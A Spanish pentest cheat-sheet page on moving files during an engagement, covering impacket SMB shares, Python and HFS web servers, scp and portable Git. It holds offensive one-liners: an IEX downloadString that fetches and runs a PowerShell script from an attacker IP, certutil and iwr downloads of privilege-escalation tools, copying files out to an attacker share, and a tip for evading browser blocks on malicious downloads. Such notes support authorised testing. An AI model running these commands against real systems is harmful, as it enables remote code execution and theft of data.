Transferencia de ficheros

Servidores temporales

SMB

Se busca el binario de impacket-smbserver:

> locate smbserver

/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py

Se ejecuta una carpeta compartida vía SMB:

sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin

Se monta la carpeta vía CMD/Powershell:

net use z: \\192.168.1.100\share /user:xtormin xtormin

Se accede a la carpeta compartida y se descargan los ficheros que se quieran:

net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share

HTTP

HFS

https://www.rejetto.com/hfs/

Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.

Python

python3 -m http.server 8000

Descarga de ficheros

Servidores temporales

SMB

Se busca el binario de impacket-smbserver:

> locate smbserver

/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py

Se sirve una carpeta compartida vía SMB:

sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin

Se monta la carpeta vía CMD/Powershell:

net use z: \\192.168.1.100\share /user:xtormin xtormin

Se accede a la carpeta compartida y se descargan los ficheros que se quieran:

net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share

HTTP

HFS

https://www.rejetto.com/hfs/

Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.

Python

python3 -m http.server 8000

Descarga y subida de ficheros

Linux

wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"

Windows

iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')

.\certutil.exe -urlcache -split -f "http://legacy.ps1"

Consideraciones

SSH

Descarga desde servidor remoto a local:

USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $USER@$IP:$RUTASRV $RUTALOCAL

Subida desde local a servidor remoto:

USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $RUTALOCAL $USER@$IP:$RUTASRV

Git - Descarga de repositorios

En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.

Git

https://git-scm.com/download/win/

cd PortableGit-2.46.2-64-bit
.\git-bash.exe

Esto abrirá una consola desde la que se podrá clonar el repositorio:

cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.git

Referencias

https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

AnteriorMisc SiguienteCracking

Última actualización hace 3 meses

hashtagServidores temporales

hashtagSMB

hashtagHTTP

hashtagHFS

hashtagPython

hashtagDescarga de ficheros

hashtagServidores temporales

hashtagSMB

hashtagHTTP

hashtagHFS

hashtagPython

hashtagDescarga y subida de ficheros

hashtagLinux

hashtagWindows

hashtagConsideraciones

hashtagSSH

hashtagGit - Descarga de repositorios

hashtagGit

hashtagReferencias

Servidores temporales

SMB

HTTP

HFS

Python

Descarga de ficheros

Servidores temporales

SMB

HTTP

HFS

Python

Descarga y subida de ficheros

Linux

Windows

Consideraciones

SSH

Git - Descarga de repositorios

Git

Referencias